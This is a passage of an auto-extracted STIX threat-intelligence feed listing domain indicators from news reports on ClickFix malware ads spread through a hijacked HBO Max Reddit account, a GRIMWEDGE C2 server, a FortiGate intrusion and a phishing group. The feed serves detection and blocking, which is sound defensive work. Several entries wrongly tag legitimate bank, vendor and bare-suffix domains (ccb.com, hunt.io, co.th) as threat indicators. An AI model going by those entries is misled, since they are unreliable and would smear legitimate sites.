ouilov.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domains Domain loop","pattern":"[domain-name:value = 'ouilov.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--83f51b10-b6f6-41b3-9fc3-6872d66fd979","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: papartybus.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sp","pattern":"[domain-name:value = 'papartybus.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--90d14041-6954-4c79-b02c-e1e18729d350","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: perchframe15.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: mains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS lo","pattern":"[domain-name:value = 'perchframe15.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--20abd214-453f-4a83-9955-727fa2a2bc41","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: pine63.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery domains Domain we","pattern":"[domain-name:value = 'pine63.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b4f9d443-5434-494e-9b88-fe422bf132c5","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: pinescope11.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: lawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.","pattern":"[domain-name:value = 'pinescope11.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c39331e0-c661-4b24-a46d-72994317e5eb","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: press29.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m; camaligsalvatrefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canv","pattern":"[domain-name:value = 'press29.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--efc10661-d7ae-49de-b50a-842c2ee1d061","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: pressureulcerlawyer.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: delivery domains Domain houstongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope1","pattern":"[domain-name:value = 'pressureulcerlawyer.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--11a74713-f358-45d1-a0ef-16c8012ceeda","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: rectangleap.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; codex-craft[.]com; c","pattern":"[domain-name:value = 'rectangleap.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ce743827-b960-46b3-acb7-ee2720dd6fe4","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: remotion-skills.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: op; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning-neighborhood domains D","pattern":"[domain-name:value = 'remotion-skills.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d42cfab2-1b8e-4721-976e-1c6b1544c8dd","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: restoremental.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: gtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemade","pattern":"[domain-name:value = 'restoremental.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--14458dfe-a3c9-4a35-8a75-de4e94ea3b38","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: rudder-moss.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry and delivery domai","pattern":"[domain-name:value = 'rudder-moss.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5c7f64e4-12d2-4b7a-885c-ab9115f3f9f0","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: sgaaagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; b","pattern":"[domain-name:value = 'sgaaagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6691eda6-9f62-4970-92d4-af6ed10b1f23","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: sic180.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: rsion[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]namebright[.]bike SIC Windows-route domains Do","pattern":"[domain-name:value = 'sic180.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8a27cedd-348b-4eda-9872-383298392d47","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: sprieagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]co","pattern":"[domain-name:value = 'sprieagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f50765a1-4c7a-4011-a5f1-a0c6c5aceda8","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: storageprofiler.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: le activity IP address 172.236.51[.]169 Origin observed for storageprofiler[.]com gated lure IP address 138.124.93[.]32 AMOS helper /contac","pattern":"[domain-name:value = 'storageprofiler.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4f06469e-1ff8-4e6e-836b-4e58ab39a262","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: thepullmanfolkestone.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: sioning-neighborhood domains Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonlin","pattern":"[domain-name:value = 'thepullmanfolkestone.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--de568fb7-2504-476d-9057-6c6ce49d3c52","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: trekmesh15.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery domains Domain weaveridge7[.]com; e","pattern":"[domain-name:value = 'trekmesh15.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dd9f9c15-2da4-4425-8520-ad24a9585240","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: umapla.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: om AMOS helper and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains Domain desktop","pattern":"[domain-name:value = 'umapla.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ca0849e4-0af4-4111-8ca3-a16d1fc8a16a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: verse-18.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com A","pattern":"[domain-name:value = 'verse-18.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a97a3bc0-27ab-40e1-8ec2-38ac15a9de12","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: wantsellonline.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: osoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; s","pattern":"[domain-name:value = 'wantsellonline.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a2a01832-156a-4839-99b9-c5c0a7729ff6","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: weaveridge7.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; trekmesh15[.]com macOS loader-delivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com Septe","pattern":"[domain-name:value = 'weaveridge7.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3550b6db-3c01-4a5b-8224-8e65dfb3a141","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: wuess.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: n weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry and delivery domains Domain hou","pattern":"[domain-name:value = 'wuess.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d59c1d24-e6f3-4007-99d0-b2806ae85287","created":"2026-09-15T05:31:05.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: opusaccel.top","description":"Seen in \"China-Linked Hackers Exploit Chrome-Windows Zero-Day Chain to Deploy GRIMWEDGE\" (The Hacker News). Context: and loop that polls a command-and-control (C2) server (\"ocr.opusaccel[.]top\") to receive further instructions that are then executed","pattern":"[domain-name:value = 'opusaccel.top']","pattern_type":"stix","valid_from":"2026-09-15T05:31:05.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/china-linked-hackers-exploit-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a926214d-1f15-4d5e-b642-bd6a77d5ef64","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: code-desktop.com","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: promoting a fake macOS disk-cleaning service, 11 using the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . Th","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--86835f35-f595-4399-89f1-050991577ea0","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: codex-craft.com","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: inting to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 15 promoting a fake macOS disk-cleaning service, 11 usi","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3bf5d1ef-e470-434d-9350-22320c769f45","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomax-macos.com","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: ng the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . The mix shows that the operators were targeting both en","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d9870844-fa0a-4859-9efb-7509d8e97d51","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomaxx.app","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: al lure categories, including 40 advertisements pointing to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 1","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bbe259ef-e9b5-4f07-94ba-a119b152e6aa","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomaxx.us","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: cted to counterfeit HBO Max-themed landing pages, including hbomaxx[.]us . Rather than serving a conventional installer, the site","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d6a3a0e-8450-426d-9929-9b6f4317d275","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ayuthayatech.com","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: fied a device group named TH-3BB and directed agents to www.ayuthayatech[.]com, using the MeshCentral WebSocket endpoint /agent.ashx. A","pattern":"[domain-name:value = 'ayuthayatech.com']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9908185a-6817-4efb-a76c-a10125717af0","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: co.th","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: focused on the FortiGate 60F SSL-VPN appliance at mail.3bb.co[.]th:10443. Scripts named forti1.sh through forti8.sh performe","pattern":"[domain-name:value = 'co.th']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2fe426ac-f190-4e5d-b5e9-f8bb5032b12a","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hunt.io","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: 10.11.152[.]4:8009 using CVE-2020-1938, known as Ghostcat. Hunt.io reported evidence of root-level command execution on a comp","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--418e7c87-e6e4-42b6-807b-bdd8d0da441d","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: triplet.co","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: ernal 10.11.x.x environment and systems associated with the triplet.co.th domain. Recovered network configuration data suggested t","pattern":"[domain-name:value = 'triplet.co']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--92dd62cd-49da-45ab-b4cd-cbfb8fdf37ae","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: abchina.com","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: .]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural Credit","pattern":"[domain-name:value = 'abchina.com']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fa064a65-73e8-4964-aaef-c152bc716401","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ccb.com","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: k of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural Credit Cooperatives: a cooperative or credit unio","pattern":"[domain-name:value = 'ccb.com']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1fe228aa-632a-4dbc-9441-5a93bf9c96cb","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: com.cn","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: Note: ICBC: Industrial and Commercial Bank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/Agricultu","pattern":"[domain-name:value = 'com.cn']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c88b8c99-c634-44f5-abf2-6c7ea371af65","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: lzbank.com","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: Bank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abc","pattern":"[domain-name:value = 'lzbank.com']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cb8b01e2-aef0-43fc-a340-b69f40c416aa","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: clean-disk-guide.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: Of the rest: 15 purported to be a macOS disk utility (apple.clean-disk-guide[.]com) and 11 used other developer tools as lures (code-desktop","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dd990e75-3624-4831-9eb9-ee0ac5ea7a82","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: code-desktop.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: 